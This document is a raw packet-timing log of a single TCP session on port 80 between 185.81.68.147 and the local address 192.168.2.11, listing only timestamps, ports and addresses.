                                                                                                                                                                                                Dec 13, 2024 08:18:53.398191929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.398257017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.398298025 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.399353027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.399512053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.399554968 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.400557995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.400674105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.400752068 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.401729107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.401832104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.401871920 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.404527903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.404546022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.404593945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.404607058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.404652119 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.404699087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.405316114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.405752897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.405797958 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.406626940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.406982899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.407032013 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.407707930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.407871962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.407910109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.409106970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.409274101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.409363031 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.410116911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.410223007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.410264969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.411483049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.411679029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.411720991 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.412662029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.412834883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.412875891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.413666010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.413940907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.413986921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.414992094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.415178061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.415224075 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.416070938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.416325092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.416367054 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.418309927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.418488026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.418574095 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.418930054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.418945074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.418984890 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.420026064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.420584917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.420627117 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.421353102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.421449900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.421489000 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.421999931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.422127962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.422171116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.423693895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.423707962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.423842907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.424660921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.424676895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.424801111 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.425762892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.425939083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.425978899 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.426832914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.427027941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.427109957 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.427997112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.428131104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.428210974 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.429254055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.429395914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.429445028 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.430387974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.430542946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.430579901 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.431731939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.431901932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.431979895 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.432987928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.433001995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.433043003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.434290886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.434303045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.434345007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.435237885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.435467958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.435511112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.436316013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.480637074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.565670013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.565821886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.565969944 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.566270113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.566380978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.566461086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.567423105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.567949057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.568007946 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.568046093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.569077015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.569128036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.569192886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.570312023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.570367098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.570403099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.571496010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.571552992 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.571587086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.572724104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.572777987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.572813988 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.573904991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.573956013 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.574249029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.575090885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.575120926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.575156927 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.576258898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.576323986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.576356888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.577429056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.577486038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.577491999 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.578682899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.578749895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.578756094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.579830885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.579893112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.579925060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.581049919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.581161976 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.581216097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.582262039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.582431078 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.582609892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.583436966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.583534956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.583573103 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.584605932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.584686995 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.584728956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.585804939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.585874081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.585915089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.586986065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.587042093 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.587100029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.588191986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.588251114 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.588291883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.589436054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.589494944 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.589561939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.590643883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.590699911 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.590738058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.591809034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.591866970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.591870070 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.592957020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.593014956 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.593080997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.594202995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.594255924 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.594276905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.595371962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.595437050 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.595454931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.596575022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.596625090 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.596666098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.597799063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.597848892 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.597887993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.598953962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.599013090 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.599184036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.600167036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.600210905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.600295067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.601335049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.601380110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.601421118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.602567911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.602612019 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.602653027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.603734970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.603776932 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.603837013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.604940891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.604986906 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.605040073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.606096029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.606137991 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.606189013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.607322931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.607371092 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.607409954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.608515978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.608572960 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.608625889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.609726906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.609785080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.609853983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.610884905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.610930920 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.610972881 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.612076044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.612119913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.612159967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.613245964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.613322973 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.613358021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.614443064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.614514112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.614588976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.615638018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.615690947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.615755081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.616856098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.616918087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.616956949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.618040085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.618082047 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.618161917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.619251966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.619337082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.619357109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.620444059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.620503902 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.620546103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.621629953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.621670008 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.621735096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.622874975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.622931004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.622950077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.623987913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.624031067 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.624113083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.625221968 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.625267029 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.625305891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.626512051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.626530886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.626580954 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.627582073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.627641916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.627666950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.668158054 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.757786989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.757955074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.758054972 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.758373022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.758501053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.758543968 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.759560108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.759680033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.759728909 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.760781050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.760902882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.760981083 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.761945963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.762005091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.762048960 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.763184071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.763358116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.763411999 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.764350891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.764458895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.764539003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.765527010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.765652895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.765746117 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.766721010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.766844988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.766927004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.767920971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.768042088 CET8049726185.81.68.147192.168.2.11
